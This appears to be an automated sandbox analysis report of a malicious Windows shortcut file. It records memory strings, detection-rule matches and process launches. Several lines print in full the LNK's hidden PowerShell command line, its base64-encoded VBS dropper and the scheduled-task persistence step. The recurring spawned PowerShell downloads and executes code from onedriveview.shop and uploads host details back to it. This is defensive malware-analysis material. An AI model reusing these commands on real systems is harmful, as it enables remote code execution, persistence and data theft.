              Source: powershell.exe, 00000005.00000002.2708175995.0000025301A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000005.00000002.2708175995.0000025301A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: qmgr.db.7.dr, edb.log.7.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
              Source: edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
              Source: edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
              Source: edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
              Source: edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
              Source: powershell.exe, 00000005.00000002.2708175995.000002530022E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000000.00000002.1848046574.000001B6E30E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2708175995.00000253011A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.4143788357.000001ABD6040000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000000.00000002.1894925547.000001B6F251F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1894925547.000001B6F2662000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2759329285.00000253101B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2708175995.0000025301A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: qmgr.db.7.dr, edb.log.7.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
              Source: edb.log.7.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
              Source: powershell.exe, 00000012.00000002.4143788357.000001ABD5B67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedriveview.sh
              Source: powershell.exe, 00000000.00000002.1848046574.000001B6E3AF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1848046574.000001B6E3AE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2708175995.00000253011A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2708175995.00000253016CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.4143788357.000001ABD6040000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedriveview.shop
              Source: powershell.exe, 00000012.00000002.4143788357.000001ABD5F8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedriveview.shop/api/va
              Source: powershell.exe, 00000012.00000002.4143788357.000001ABD6647000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.4143788357.000001ABD6610000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedriveview.shop/api/val
              Source: powershell.exe, 00000000.00000002.1848046574.000001B6E3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedriveview.shop/api/value
              Source: powershell.exe, 00000012.00000002.4194744188.000001ABEDE20000.00000004.00000020.00020000.00000000.sdmp, Libraries.vbs.0.drString found in binary or memory: https://onedriveview.shop/api/values/82980464243822115700/refresh81/
              Source: powershell.exe, 00000012.00000002.4143788357.000001ABD6040000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedriveview.shop/api/values/82980464243822115700/refresh81/3021569784.txt
              Source: powershell.exe, 00000005.00000002.2708175995.00000253011A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedriveview.shop/api/values/82980464243822115700/refresh81/9738145602.txt
              Source: powershell.exe, 00000012.00000002.4194744188.000001ABEDE20000.00000004.00000020.00020000.00000000.sdmp, Libraries.vbs.0.drString found in binary or memory: https://onedriveview.shop/api/values/refresh81
              Source: powershell.exe, 00000012.00000002.4143788357.000001ABD5F8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedriveview.shop/api/values/refresh81X
              Source: Xkci1BfrmX.lnkString found in binary or memory: https://onedriveview.shop/api/values/view/sklyar.txt

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi64_6928.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 6928, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Windows shortcut file (LNK) contains suspicious command line arguments
              Source: Xkci1BfrmX.lnkLNK file: -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vb25lZHJpdmV2aWV3LnNob3AvYXBpL3ZhbHVlcy9yZWZyZXNoODEnLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f;
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B71246D0_2_00007FFD9B71246D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B6E243D5_2_00007FFD9B6E243D
              Source: amsi64_6928.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 6928, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.spre.troj.expl.evad.winLNK@29/47@0/3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Libraries\Libraries.vbsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8172:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7604:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y15y4gvz.z0g.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vb25lZHJpdmV2aWV3LnNob3AvYXBpL3ZhbHVlcy9yZWZyZXNoODEnLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f;
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
              Source: Xkci1BfrmX.lnkReversingLabs: Detection: 18%
              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vb25lZHJpdmV2aWV3LnNob3AvYXBpL3ZhbHVlcy9yZWZyZXNoODEnLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f;
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\appdata\local\temp\sklyar.pdf"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2232 --field-trial-handle=1508,i,8450144638513138785,4609180756953587241,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\appdata\local\temp\sklyar.pdf"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /fJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}Jump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2232 --field-trial-handle=1508,i,8450144638513138785,4609180756953587241,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
